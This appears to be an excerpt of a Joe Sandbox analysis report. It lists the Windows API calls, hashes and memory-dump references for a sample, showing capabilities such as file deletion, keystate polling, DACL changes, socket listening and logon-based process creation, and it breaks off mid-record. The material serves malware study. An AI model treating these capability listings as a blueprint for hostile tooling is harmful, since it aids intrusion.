                                                                        • __wsplitpath.LIBCMT ref: 00940A59
                                                                        • _wcscat.LIBCMT ref: 00940A71
                                                                        • _wcscat.LIBCMT ref: 00940A83
                                                                        • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00940A98
                                                                        • SetCurrentDirectoryW.KERNEL32(?), ref: 00940AAC
                                                                        • SetCurrentDirectoryW.KERNEL32(?), ref: 00940ADE
                                                                        • SetCurrentDirectoryW.KERNEL32(?), ref: 00940AFF
                                                                        • _wcscpy.LIBCMT ref: 00940B0B
                                                                        • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?), ref: 00940B4A
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1287655669.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                        • Associated: 00000000.00000002.1287639553.00000000008F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287713878.000000000097D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287713878.000000000099E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287765444.00000000009AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287785345.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_8f0000_A2028041200SD.jbxd
                                                                        Similarity
                                                                        • API ID: CurrentDirectoryTime$File$Local_wcscat$System__wsplitpath_wcscpy
                                                                        • String ID: *.*
                                                                        • API String ID: 3566783562-438819550
                                                                        • Opcode ID: a5e10997883698f56821f679804c8ef7e4978e595c1acb3a5fe6913667d9ba52
                                                                        • Instruction ID: 736dac7502b6e8ca4ec07b9dacbfb457d4da39e703faead4485b2378d5ee50e4
                                                                        • Opcode Fuzzy Hash: a5e10997883698f56821f679804c8ef7e4978e595c1acb3a5fe6913667d9ba52
                                                                        • Instruction Fuzzy Hash: B76147725083099FD710EF64C845EAEB3E8FFC9314F04891AEA99C7251DB35E945CB92
                                                                        APIs
                                                                          • Part of subcall function 0092ABBB: GetUserObjectSecurity.USER32(?,?,?,00000000,?), ref: 0092ABD7
                                                                          • Part of subcall function 0092ABBB: GetLastError.KERNEL32(?,0092A69F,?,?,?), ref: 0092ABE1
                                                                          • Part of subcall function 0092ABBB: GetProcessHeap.KERNEL32(00000008,?,?,0092A69F,?,?,?), ref: 0092ABF0
                                                                          • Part of subcall function 0092ABBB: HeapAlloc.KERNEL32(00000000,?,0092A69F,?,?,?), ref: 0092ABF7
                                                                          • Part of subcall function 0092ABBB: GetUserObjectSecurity.USER32(?,?,00000000,?,?), ref: 0092AC0E
                                                                          • Part of subcall function 0092AC56: GetProcessHeap.KERNEL32(00000008,0092A6B5,00000000,00000000,?,0092A6B5,?), ref: 0092AC62
                                                                          • Part of subcall function 0092AC56: HeapAlloc.KERNEL32(00000000,?,0092A6B5,?), ref: 0092AC69
                                                                          • Part of subcall function 0092AC56: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,0092A6B5,?), ref: 0092AC7A
                                                                        • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 0092A6D0
                                                                        • _memset.LIBCMT ref: 0092A6E5
                                                                        • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 0092A704
                                                                        • GetLengthSid.ADVAPI32(?), ref: 0092A715
                                                                        • GetAce.ADVAPI32(?,00000000,?), ref: 0092A752
                                                                        • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 0092A76E
                                                                        • GetLengthSid.ADVAPI32(?), ref: 0092A78B
                                                                        • GetProcessHeap.KERNEL32(00000008,-00000008), ref: 0092A79A
                                                                        • HeapAlloc.KERNEL32(00000000), ref: 0092A7A1
                                                                        • GetLengthSid.ADVAPI32(?,00000008,?), ref: 0092A7C2
                                                                        • CopySid.ADVAPI32(00000000), ref: 0092A7C9
                                                                        • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 0092A7FA
                                                                        • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 0092A820
                                                                        • SetUserObjectSecurity.USER32(?,00000004,?), ref: 0092A834
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1287655669.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                        • Associated: 00000000.00000002.1287639553.00000000008F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287713878.000000000097D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287713878.000000000099E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287765444.00000000009AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287785345.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_8f0000_A2028041200SD.jbxd
                                                                        Similarity
                                                                        • API ID: HeapSecurity$AllocDescriptorLengthObjectProcessUser$Dacl$CopyErrorInformationInitializeLast_memset
                                                                        • String ID:
                                                                        • API String ID: 3996160137-0
                                                                        • Opcode ID: 0228c70bd171e49077b3d60455076bb2ade9cf672fcae73a9a02a393d6ece1c5
                                                                        • Instruction ID: 8bc0c72a9c9a527cf76a8781655cca855f858ea2257100ba1b7802af7bc8fb17
                                                                        • Opcode Fuzzy Hash: 0228c70bd171e49077b3d60455076bb2ade9cf672fcae73a9a02a393d6ece1c5
                                                                        • Instruction Fuzzy Hash: FA516B72900219AFDF00DFA4EC44EEEBBB9FF44310F048129F915A72A0DB349A46DB61
                                                                        APIs
                                                                          • Part of subcall function 00936EBB: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,00935FA6,?), ref: 00936ED8
                                                                          • Part of subcall function 009372CB: GetFileAttributesW.KERNEL32(?,00936019), ref: 009372CC
                                                                        • _wcscat.LIBCMT ref: 00936441
                                                                        • __wsplitpath.LIBCMT ref: 0093645F
                                                                        • FindFirstFileW.KERNEL32(?,?), ref: 00936474
                                                                        • _wcscpy.LIBCMT ref: 009364A3
                                                                        • _wcscat.LIBCMT ref: 009364B8
                                                                        • _wcscat.LIBCMT ref: 009364CA
                                                                        • DeleteFileW.KERNEL32(?), ref: 009364DA
                                                                        • FindNextFileW.KERNEL32(00000000,00000010), ref: 009364EB
                                                                        • FindClose.KERNEL32(00000000), ref: 00936506
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1287655669.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                        • Associated: 00000000.00000002.1287639553.00000000008F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287713878.000000000097D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287713878.000000000099E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287765444.00000000009AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287785345.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_8f0000_A2028041200SD.jbxd
                                                                        Similarity
                                                                        • API ID: File$Find_wcscat$AttributesCloseDeleteFirstFullNameNextPath__wsplitpath_wcscpy
                                                                        • String ID: \*.*$p1Mw`KNw
                                                                        • API String ID: 2643075503-2160596699
                                                                        • Opcode ID: 4703dec5613a44dc327adf3c6de7f403704d842a1d2a0a4b5a191b22ba43a53f
                                                                        • Instruction ID: 70246ca6ba44d3c20d76aaa130732d98ede41a35bd55ce9deab713bf6d507b1b
                                                                        • Opcode Fuzzy Hash: 4703dec5613a44dc327adf3c6de7f403704d842a1d2a0a4b5a191b22ba43a53f
                                                                        • Instruction Fuzzy Hash: 1031B8B240C3486AC321DBA48885ADBB7ECAF95300F40492AF5D9C3141EB36D54DCBA7
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1287655669.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                        • Associated: 00000000.00000002.1287639553.00000000008F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287713878.000000000097D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287713878.000000000099E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287765444.00000000009AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287785345.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_8f0000_A2028041200SD.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: ANY)$ANYCRLF)$BSR_ANYCRLF)$BSR_UNICODE)$CR)$CRLF)$LF)$LIMIT_MATCH=$LIMIT_RECURSION=$NO_AUTO_POSSESS)$NO_START_OPT)$UCP)$UTF)$UTF16)
                                                                        • API String ID: 0-4052911093
                                                                        • Opcode ID: 880549d7bfdf1af2bbb1b27f39f532a913da597072ad40b932acd73ed20b5fc0
                                                                        • Instruction ID: 035e186da94af512e036b49014190725fcaff8cfa585013e63ffcb9208b709dd
                                                                        • Opcode Fuzzy Hash: 880549d7bfdf1af2bbb1b27f39f532a913da597072ad40b932acd73ed20b5fc0
                                                                        • Instruction Fuzzy Hash: 7E726172E14219DBDB24CF68C8407BEB7B5FF54310F14816AE949EB280EB749E41DB94
                                                                        APIs
                                                                          • Part of subcall function 00953C06: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00952BB5,?,?), ref: 00953C1D
                                                                        • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0095328E
                                                                          • Part of subcall function 008F936C: __swprintf.LIBCMT ref: 008F93AB
                                                                          • Part of subcall function 008F936C: __itow.LIBCMT ref: 008F93DF
                                                                        • RegQueryValueExW.ADVAPI32(?,?,00000000,?,00000000,?), ref: 0095332D
                                                                        • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,00000008), ref: 009533C5
                                                                        • RegCloseKey.ADVAPI32(000000FE,000000FE,00000000,?,00000000), ref: 00953604
                                                                        • RegCloseKey.ADVAPI32(00000000), ref: 00953611
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1287655669.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                        • Associated: 00000000.00000002.1287639553.00000000008F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287713878.000000000097D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287713878.000000000099E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287765444.00000000009AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287785345.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_8f0000_A2028041200SD.jbxd
                                                                        Similarity
                                                                        • API ID: CloseQueryValue$BuffCharConnectRegistryUpper__itow__swprintf
                                                                        • String ID:
                                                                        • API String ID: 1240663315-0
                                                                        • Opcode ID: 0e458219f318b4e5aee537865bc224f5621af6645dbc063115179087fa67a4b1
                                                                        • Instruction ID: acfaee03ae014cbee398904dc92cceebaff87244dd3a2c3d0e9e9ab651ec684e
                                                                        • Opcode Fuzzy Hash: 0e458219f318b4e5aee537865bc224f5621af6645dbc063115179087fa67a4b1
                                                                        • Instruction Fuzzy Hash: 25E15C71604204AFCB14DF29C995E2ABBE8FF89350F04896DF94AD72A1DB30E905CB52
                                                                        APIs
                                                                        • GetKeyboardState.USER32(?), ref: 00932B5F
                                                                        • GetAsyncKeyState.USER32(000000A0), ref: 00932BE0
                                                                        • GetKeyState.USER32(000000A0), ref: 00932BFB
                                                                        • GetAsyncKeyState.USER32(000000A1), ref: 00932C15
                                                                        • GetKeyState.USER32(000000A1), ref: 00932C2A
                                                                        • GetAsyncKeyState.USER32(00000011), ref: 00932C42
                                                                        • GetKeyState.USER32(00000011), ref: 00932C54
                                                                        • GetAsyncKeyState.USER32(00000012), ref: 00932C6C
                                                                        • GetKeyState.USER32(00000012), ref: 00932C7E
                                                                        • GetAsyncKeyState.USER32(0000005B), ref: 00932C96
                                                                        • GetKeyState.USER32(0000005B), ref: 00932CA8
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1287655669.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                        • Associated: 00000000.00000002.1287639553.00000000008F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287713878.000000000097D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287713878.000000000099E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287765444.00000000009AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287785345.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_8f0000_A2028041200SD.jbxd
                                                                        Similarity
                                                                        • API ID: State$Async$Keyboard
                                                                        • String ID:
                                                                        • API String ID: 541375521-0
                                                                        • Opcode ID: 108045adf919256da86af8791fb654e5bbd858dece5773e10b38573795ed4e88
                                                                        • Instruction ID: 5081b4277e49ccaaeccec1cd04bb465ea07ef698eda978c670b499f540413b13
                                                                        • Opcode Fuzzy Hash: 108045adf919256da86af8791fb654e5bbd858dece5773e10b38573795ed4e88
                                                                        • Instruction Fuzzy Hash: E841D8345087C96EFF359B6488443B9FEF96F12344F049099D5C6562C1DBA49DC4CFA2
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1287655669.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                        • Associated: 00000000.00000002.1287639553.00000000008F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287713878.000000000097D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287713878.000000000099E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287765444.00000000009AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287785345.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_8f0000_A2028041200SD.jbxd
                                                                        Similarity
                                                                        • API ID: Clipboard$AllocCloseEmptyGlobalOpen
                                                                        • String ID:
                                                                        • API String ID: 1737998785-0
                                                                        • Opcode ID: d7a84d4fab13720c46c584c503085bd728338cec00945095d4df53e7329b6bb6
                                                                        • Instruction ID: 820debaf60f1a82e741a4bb0fb7d821f3939205a28e011bcbd4ca2f9d4a583b0
                                                                        • Opcode Fuzzy Hash: d7a84d4fab13720c46c584c503085bd728338cec00945095d4df53e7329b6bb6
                                                                        • Instruction Fuzzy Hash: CF219A72715610AFEB01AF64DC49F2E77A8FF85721F00841AF94ADB2A1DB34E8419B91
                                                                        APIs
                                                                          • Part of subcall function 00929ABF: CLSIDFromProgID.OLE32 ref: 00929ADC
                                                                          • Part of subcall function 00929ABF: ProgIDFromCLSID.OLE32(?,00000000), ref: 00929AF7
                                                                          • Part of subcall function 00929ABF: lstrcmpiW.KERNEL32(?,00000000), ref: 00929B05
                                                                          • Part of subcall function 00929ABF: CoTaskMemFree.OLE32(00000000,?,00000000), ref: 00929B15
                                                                        • CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000002,00000003,00000000,00000000,00000000,?,?,?), ref: 0094C235
                                                                        • _memset.LIBCMT ref: 0094C242
                                                                        • _memset.LIBCMT ref: 0094C360
                                                                        • CoCreateInstanceEx.OLE32(?,00000000,00000015,?,00000001,00000001), ref: 0094C38C
                                                                        • CoTaskMemFree.OLE32(?), ref: 0094C397
                                                                        Strings
                                                                        • NULL Pointer assignment, xrefs: 0094C3E5
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1287655669.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                        • Associated: 00000000.00000002.1287639553.00000000008F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287713878.000000000097D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287713878.000000000099E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287765444.00000000009AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287785345.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_8f0000_A2028041200SD.jbxd
                                                                        Similarity
                                                                        • API ID: FreeFromProgTask_memset$CreateInitializeInstanceSecuritylstrcmpi
                                                                        • String ID: NULL Pointer assignment
                                                                        • API String ID: 1300414916-2785691316
                                                                        • Opcode ID: 7b27100e90c1c58a2bd071ceab410deae5378cc58182682b115630d4e5e19cc4
                                                                        • Instruction ID: 5009572ce531790bfa79753c90ddd853df74f15183a6cb53b6d37c5488f6c03f
                                                                        • Opcode Fuzzy Hash: 7b27100e90c1c58a2bd071ceab410deae5378cc58182682b115630d4e5e19cc4
                                                                        • Instruction Fuzzy Hash: 53913971D01218AFDB10DFA4DC51EEEBBB8EF48310F10812AF519A7291EB709A45CFA1
                                                                        APIs
                                                                        • FindFirstFileW.KERNEL32(?,?,*.*,?,?,00000000,00000000), ref: 00941FE1
                                                                        • Sleep.KERNEL32(0000000A,?,00000000,00000000), ref: 00942011
                                                                        • _wcscmp.LIBCMT ref: 00942025
                                                                        • _wcscmp.LIBCMT ref: 00942040
                                                                        • FindNextFileW.KERNEL32(?,?,?,00000000,00000000), ref: 009420DE
                                                                        • FindClose.KERNEL32(00000000,?,00000000,00000000), ref: 009420F4
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1287655669.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                        • Associated: 00000000.00000002.1287639553.00000000008F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287713878.000000000097D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287713878.000000000099E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287765444.00000000009AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287785345.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_8f0000_A2028041200SD.jbxd
                                                                        Similarity
                                                                        • API ID: Find$File_wcscmp$CloseFirstNextSleep
                                                                        • String ID: *.*
                                                                        • API String ID: 3356411064-438819550
                                                                        • Opcode ID: da1eff7110423e53b3213a4cd5b40806e213c3e02c44ac2a1c8e1f2f31fa540a
                                                                        • Instruction ID: 343d3d1166c97d1efb8179eafcd8aedb2e7449e010e9ab73359d4e12e288dfa1
                                                                        • Opcode Fuzzy Hash: da1eff7110423e53b3213a4cd5b40806e213c3e02c44ac2a1c8e1f2f31fa540a
                                                                        • Instruction Fuzzy Hash: 7C41597190520EAFCF14DFA4C849BEEBBB8FF45314F544456F915A3291EB709A84CB90
                                                                        APIs
                                                                          • Part of subcall function 0092B134: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 0092B180
                                                                          • Part of subcall function 0092B134: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 0092B1AD
                                                                          • Part of subcall function 0092B134: GetLastError.KERNEL32 ref: 0092B1BA
                                                                        • ExitWindowsEx.USER32(?,00000000), ref: 00937A0F
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1287655669.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                        • Associated: 00000000.00000002.1287639553.00000000008F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287713878.000000000097D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287713878.000000000099E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287765444.00000000009AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287785345.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_8f0000_A2028041200SD.jbxd
                                                                        Similarity
                                                                        • API ID: AdjustErrorExitLastLookupPrivilegePrivilegesTokenValueWindows
                                                                        • String ID: $@$SeShutdownPrivilege
                                                                        • API String ID: 2234035333-194228
                                                                        • Opcode ID: 378f2ce2ce9ee86bae41c18a3d7fd49c2ebb3b9fc819fc4e3e79be8b33b9a409
                                                                        • Instruction ID: 63f611afbbe8d49a96c95efbc23600c017b4269e2aa29bab717e3a709a85b6cd
                                                                        • Opcode Fuzzy Hash: 378f2ce2ce9ee86bae41c18a3d7fd49c2ebb3b9fc819fc4e3e79be8b33b9a409
                                                                        • Instruction Fuzzy Hash: BA01F7B26692216AF73816E89C8BBBFB26C9B00341F140824F903E20C2E5645E0099B0
                                                                        APIs
                                                                        • socket.WSOCK32(00000002,00000001,00000006,?,00000002,00000000), ref: 00948CA8
                                                                        • WSAGetLastError.WSOCK32(00000000), ref: 00948CB7
                                                                        • bind.WSOCK32(00000000,?,00000010), ref: 00948CD3
                                                                        • listen.WSOCK32(00000000,00000005), ref: 00948CE2
                                                                        • WSAGetLastError.WSOCK32(00000000), ref: 00948CFC
                                                                        • closesocket.WSOCK32(00000000,00000000), ref: 00948D10
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1287655669.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                        • Associated: 00000000.00000002.1287639553.00000000008F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287713878.000000000097D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287713878.000000000099E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287765444.00000000009AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287785345.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_8f0000_A2028041200SD.jbxd
                                                                        Similarity
                                                                        • API ID: ErrorLast$bindclosesocketlistensocket
                                                                        • String ID:
                                                                        • API String ID: 1279440585-0
                                                                        • Opcode ID: 53059a54e57e683fd61591a8f325389eb9711fd19b73d2a559f03c1bcbfb1a6e
                                                                        • Instruction ID: 3a4f7f190450252bf2afdf665e0a8a03c47b7c5b1e5199f10c35cc3f6d85a5a0
                                                                        • Opcode Fuzzy Hash: 53059a54e57e683fd61591a8f325389eb9711fd19b73d2a559f03c1bcbfb1a6e
                                                                        • Instruction Fuzzy Hash: 7721A072601204AFCB14AF68CD85F6EB7B9FF48710F148558F95AA73D2CB30AD419B51
                                                                        APIs
                                                                        • GetCurrentProcess.KERNEL32(0000000A,00000004), ref: 0092AFAE
                                                                        • OpenProcessToken.ADVAPI32(00000000), ref: 0092AFB5
                                                                        • CreateEnvironmentBlock.USERENV(?,00000004,00000001), ref: 0092AFC4
                                                                        • CloseHandle.KERNEL32(00000004), ref: 0092AFCF
                                                                        • CreateProcessWithLogonW.ADVAPI32(?,?,?,00000000,00000000,?,?,00000000,?,?,?), ref: 0092AFFE
                                                                        • DestroyEnvironmentBlock.USERENV(00000000), ref: 0092B012
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1287655669.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                        • Associated: 00000000.00000002.1287639553.00000000008F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287713878.000000000097D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287713878.000000000099E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287765444.00000000009AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287785345.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_8f0000_A2028041200SD.jbxd
                                                                        Similarity
                                                                        • API ID: Process$BlockCreateEnvironment$CloseCurrentDestroyHandleLogonOpenTokenWith
                                                                        • String ID:
                                                                        • API String ID: 1413079979-0
                                                                        • Opcode ID: e56e3338b809af49a2f37dc3b267b8a68fa0fac9f53d9f4a910b2070ecfd8b55
                                                                        • Instruction ID: 7030dca60e131ebe61f8552849516560f2ad33acfd8115c1b05401d085c6bfe7
                                                                        • Opcode Fuzzy Hash: e56e3338b809af49a2f37dc3b267b8a68fa0fac9f53d9f4a910b2070ecfd8b55
                                                                        • Instruction Fuzzy Hash: D3215BB3145219AFDF028FA4EE09FEE7BADEF44304F044015FA05A2165D37A9D61EB61
                                                                        APIs
                                                                        • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,?,00000000), ref: 00936554
                                                                        • Process32FirstW.KERNEL32(00000000,0000022C), ref: 00936564
                                                                        • Process32NextW.KERNEL32(00000000,0000022C), ref: 00936583
                                                                        • __wsplitpath.LIBCMT ref: 009365A7
                                                                        • _wcscat.LIBCMT ref: 009365BA
                                                                        • CloseHandle.KERNEL32(00000000,?,00000000), ref: 009365F9
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1287655669.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                        • Associated: 00000000.00000002.1287639553.00000000008F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287713878.000000000097D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287713878.000000000099E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287765444.00000000009AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287785345.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_8f0000_A2028041200SD.jbxd
                                                                        Similarity
                                                                        • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32__wsplitpath_wcscat
                                                                        • String ID:
                                                                        • API String ID: 1605983538-0
                                                                        • Opcode ID: 263ac08e7eea5805ce3877a6f41c0246e5409d9897fabd686157bb002ba0ccc9
                                                                        • Instruction ID: b4eb13b95db3bf8ec987af530b643009cc93303354cd216c30a308b34e944331
                                                                        • Opcode Fuzzy Hash: 263ac08e7eea5805ce3877a6f41c0246e5409d9897fabd686157bb002ba0ccc9
                                                                        • Instruction Fuzzy Hash: 81217F71904218ABDB20ABA4CC88BEEB7BCAB48300F5044A5F505E7141EB759B85CFA0
                                                                        APIs
                                                                          • Part of subcall function 0094A82C: inet_addr.WSOCK32(00000000,00000000,?,?,?,00000000), ref: 0094A84E
                                                                        • socket.WSOCK32(00000002,00000002,00000011,?,?,?,00000000), ref: 00949296
                                                                        • WSAGetLastError.WSOCK32(00000000,00000000), ref: 009492B9
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1287655669.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                        • Associated: 00000000.00000002.1287639553.00000000008F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287713878.000000000097D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287713878.000000000099E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287765444.00000000009AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287785345.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_8f0000_A2028041200SD.jbxd
                                                                        Similarity
                                                                        • API ID: ErrorLastinet_addrsocket
                                                                        • String ID:
                                                                        • API String ID: 4170576061-0
                                                                        • Opcode ID: 0cd2a0b9ceeea71f6111acb847ff007d291c590edf1a34d1c56a950f69cdb204
